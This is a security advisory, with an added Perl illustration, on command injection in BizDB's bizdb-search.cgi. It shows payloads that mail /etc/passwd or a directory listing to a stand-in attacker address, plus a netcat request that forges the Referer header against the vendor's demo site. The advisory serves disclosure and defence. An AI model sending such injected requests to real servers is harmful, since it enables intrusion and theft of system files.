COMMAND

    BizDB

SYSTEMS AFFECTED

    BizDB

PROBLEM

    Black Watch  Labs found  the following.   BizDB is  a database  and
    search engine  product by  Cnctek.  Part  of the installation  is a
    CGI script, "bizdb-search.cgi",  which is used to  search the BizDB
    database.  The script  passes one of its  parameters to a  call that
    is interpreted  by the shell,  without validating it,  so a crafted
    request makes the server run user-supplied shell commands.

    The bizdb-search.cgi script is  probably a Perl script  which uses
    the open  command without  protection or  input sanity  checks.  The
    open command is used to open  the database whose name appears in the
    user input.  In Perl, a two-argument open whose filename ends in "|"
    runs the rest of the string as a shell command and reads its output,
    so an attacker can change this parameter and take advantage of  that
    piping feature: instead of  the original database file  name, say
    "bizdb", the attacker sends  "; ... exploit commands ...|",  such as
    ";cat%20/etc/passwd|mail%20attacker@evil.site|", in order to mail the
    contents of the /etc/passwd file (assuming a UNIX server) to the
    attacker's account.  The script optionally  checks that the
    HTTP_REFERER field holds a  specific value (that of  the referring
    page), but this field is  easily forged when the request  is
    generated by a raw TCP/IP client (such as "netcat", or even "telnet")
    that sends the raw request line (GET url HTTP/1.0) followed by a
    Referer line (Referer: page), where page is the one containing the
    form.
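    The following Perl script is an added illustration for this advisory and
    is not Cnctek's code: it is a minimal stand-in for the kind of open() call
    described above, shown beside a hardened version, and run locally against
    a harmless payload of the same shape as the advisory's. The parameter name
    "dbname" is taken from the advisory's URL; the ./data directory, the
    function names and the "echo INJECTED" payload are assumptions made for
    the example.

```perl
#!/usr/bin/perl
# Added illustration for this advisory, not Cnctek's code: a minimal stand-in
# for the open() call the advisory describes, beside a hardened version.
# Assumptions: the query parameter is "dbname" (from the advisory's URL) and
# database files live under ./data (an invented directory).
use strict;
use warnings;

my $dbdir = './data';

# VULNERABLE pattern.  Two-argument open lets the *data* choose the mode:
# a trailing "|" makes Perl treat the string as a command whose output is
# read, and because the string contains shell metacharacters (";", "|")
# Perl hands it to /bin/sh -c.  The attacker's leading ";" turns the
# "./data/" prefix into a separate command that fails harmlessly.
sub open_db_vulnerable {
    my ($dbname) = @_;
    open(my $fh, "$dbdir/$dbname") or return;   # "$dbdir/;cmd|" runs cmd
    return $fh;
}

# HARDENED pattern.  (1) Allow-list the name before it goes anywhere near
# open, so ";", "|", "/", "..", whitespace and NUL are rejected outright.
# (2) Use three-argument open with an explicit "<" mode: with the mode
# given separately, the path is only ever a path, never a pipe or command.
sub open_db_safe {
    my ($dbname) = @_;
    die "invalid dbname\n"
        unless defined $dbname
            && $dbname =~ /\A[A-Za-z0-9][A-Za-z0-9_-]{0,31}\z/;
    open(my $fh, '<', "$dbdir/$dbname")
        or die "cannot open $dbdir/$dbname: $!\n";
    return $fh;
}

# Demonstration with a harmless payload shaped like the advisory's
# ";ls|mail attacker@evil.site|": the injected command only echoes a marker.
my $payload = ';echo INJECTED|';

if (my $fh = open_db_vulnerable($payload)) {
    my $line = <$fh>;          # output of the injected command
    close $fh;
    print "vulnerable open ran the payload, output: $line";
}

eval { open_db_safe($payload) };
print "hardened open refused the payload: $@" if $@;
```

    Running the script prints "INJECTED" from the first open and an "invalid
    dbname" error from the second; the shell's complaint about "./data/" not
    being runnable goes to stderr and is the trace the leading ";" leaves in
    the real attack too. Note that a CGI run under Perl's taint mode
    (#!/usr/bin/perl -T) would have aborted the piped open with "Insecure
    dependency in piped open" as soon as tainted query data reached it. The
    hardened version deliberately does nothing with HTTP_REFERER: that header
    is chosen by the client and is not a control.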

    The  demonstration  area  provided  by  Cnctek  has  a  link  that
    searches for all companies in the database whose name starts  with
    'A'.  This link is

        http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=bizdb&f6=^a.*&action=searchdbdisplay

    (typed directly into a browser this link does not work, because  the
    request then carries no Referer value  that the script accepts;  this
    is why  netcat is used to  exploit the vulnerability).   If an
    attacker     changes     the      "dbname"     parameter      into
    ";ls|mail%20attacker@evil.site|" and sends the modified request:

        http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@evil.site|&f6=^a.*&action=searchdbdisplay

    the results of the ls command will be sent to the attacker's email
    account.   The  arguments  for   the  netcat  command  should   be
    www.cnctek.com 80, and the exact lines for the netcat input  (i.e.
    the HTTP request) are:

        GET /cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20attacker@evil.site|&f6=^a.*&action=searchdbdisplay HTTP/1.0
        Host: www.cnctek.com
        Referer: http://www.cnctek.com/cgi-bin/bizdb1-search.cgi?bizdb-search
        (empty line)
        (End of Input)

SOLUTION

    The vendor was contacted, but does  not seem to understand the nature
    of the problem.  In their reply  they claim that a mechanism  exists
    that prevents  the exploit.   Black Watch  Labs strongly  suspect
    they  refer  to  ensuring  that   the  "HTTP_REFERER"  environment
    variable matches the referring page on the site.  Again, this
    provides no extra  security, as it  can easily be  bypassed by
    forging the HTTP  request.  Until the  vendor ships a  fix,
    administrators should remove the script or restrict access to it; a
    real fix validates the dbname parameter against an allow-list of file
    names and opens the file in a way that cannot spawn a command.